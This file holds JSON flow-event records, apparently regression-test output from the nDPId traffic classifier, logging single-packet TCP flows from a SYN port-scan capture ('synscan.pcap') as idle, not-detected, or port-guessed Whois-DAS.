+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060437,"flow_last_seen":1278275060437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 